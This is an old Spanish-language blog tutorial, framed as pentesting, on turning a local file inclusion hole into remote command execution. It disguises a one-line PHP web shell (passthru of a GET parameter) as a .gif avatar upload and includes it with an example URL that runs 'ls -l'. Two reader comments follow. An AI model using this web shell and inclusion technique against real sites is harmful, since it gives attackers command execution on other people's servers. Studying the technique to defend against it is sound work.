miércoles 21 de octubre de 2009

Pentest: Explotación de LFI por Avatar Uploader

Creo que todos aquí alguna ves hemos visitado un foro o una comunidad online en la cual se nos permite ponernos un avatar una profile picture o algo que nos identifica ahora pues les voy a enseñar que si la web es vulnerable a LFI con esto pues podriamos ganar ventaja sobre el host victima...


Escaneamos la web de nuestra victima y tiene un LFI pero el server está bien configurado entonces no podemos sacar el passwd ni nada importante pero queremos no se a lo mejor ejecutar comandos...

digamos que el creamos un documento algo asi:


passthru($_GET[cmd])
?>

y lo guardamos como .gif o .jpg pero en esta ocación lo haremos con un .gif entonces guardamos el archivo y ahora vamos al upload de avatar y subimos nuestro programita...


Ahora si hemos subido eso pues con el LFI que tenemos podriamos hacer algo asi:

http://vuln.com/index.php?avid=../web/avatar.gif&cmd=ls -l

y seguramente nos mostraría que es lo que hay, asi como ese se podria hacer otro tipo de code para ejecutar codigo no permitido...

Espero les haya gustado este tutorial de como explotar un upload de avatar para poder llamar archivos expuestos en un LFI...


Saludos
Dr.White

2 comentarios:

Anónimo dijo...

man , felicitaciones , pero creo que falto Algo asi como en la parte que escribes :
"importante pero queremos no se a lo mejor ejecutar comandos...

digamos que el creamos un documento algo asi:"

Dr.White dijo...

Sisi habia un error ya está el code...


Saludos